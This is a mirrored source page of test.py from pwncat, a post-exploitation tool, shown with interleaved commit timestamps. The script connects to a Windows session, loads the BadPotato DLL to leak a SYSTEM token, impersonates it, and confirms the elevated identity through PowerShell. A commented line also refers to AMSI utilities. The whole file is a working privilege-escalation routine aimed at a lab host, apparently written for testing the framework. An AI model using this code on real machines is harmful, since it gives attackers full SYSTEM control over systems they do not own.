1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-27 19:04:15 +01:00
pwncat/test.py

56 lines
1.8 KiB
Python
Raw Normal View History

2020-12-30 06:36:54 +01:00
#!./env/bin/python
import json
import stat
import time
2021-01-04 00:22:17 +01:00
import subprocess
2020-12-30 06:36:54 +01:00
import pwncat.manager
2021-01-04 00:22:17 +01:00
import pwncat.platform.windows
2020-12-30 06:36:54 +01:00
# Create a manager
with pwncat.manager.Manager("data/pwncatrc") as manager:
2020-12-30 06:36:54 +01:00
# Tell the manager to create verbose sessions that
# log all commands executed on the remote host
# manager.config.set("verbose", True, glob=True)
2021-04-10 21:52:47 +02:00
# Establish a session
# session = manager.create_session("windows", host="192.168.56.10", port=4444)
session = manager.create_session("windows", host="192.168.122.11", port=4444)
# session = manager.create_session("linux", host="pwncat-ubuntu", port=4444)
# session = manager.create_session("linux", host="127.0.0.1", port=4445)
2021-01-11 00:01:08 +01:00
# session.platform.powershell("amsiutils")
try:
# Load the BadPotato plugin
session.log("leaking system token w/ BadPotato")
badpotato = session.platform.dotnet_load("BadPotato.dll")
# Call the method within the DLL to leak a system token
system_token = badpotato.get_system_token()
session.log(f"found system token: {system_token}")
session.log("impersonating token...")
# Impersonate the SYSTEM token
session.platform.impersonate(system_token)
# Checkout our active user through powershell
result = session.platform.powershell(
"[System.Security.Principal.WindowsIdentity]::GetCurrent().Name"
)
session.log(f"now running as: {result[0]}")
session.platform.refresh_uid()
session.log(session.platform.getuid())
session.log(session.find_user(uid=session.platform.getuid()))
except (
pwncat.platform.windows.ProtocolError,
pwncat.platform.windows.PowershellError,
) as exc:
session.log(f"badpotato failed: {exc}")
manager.interactive()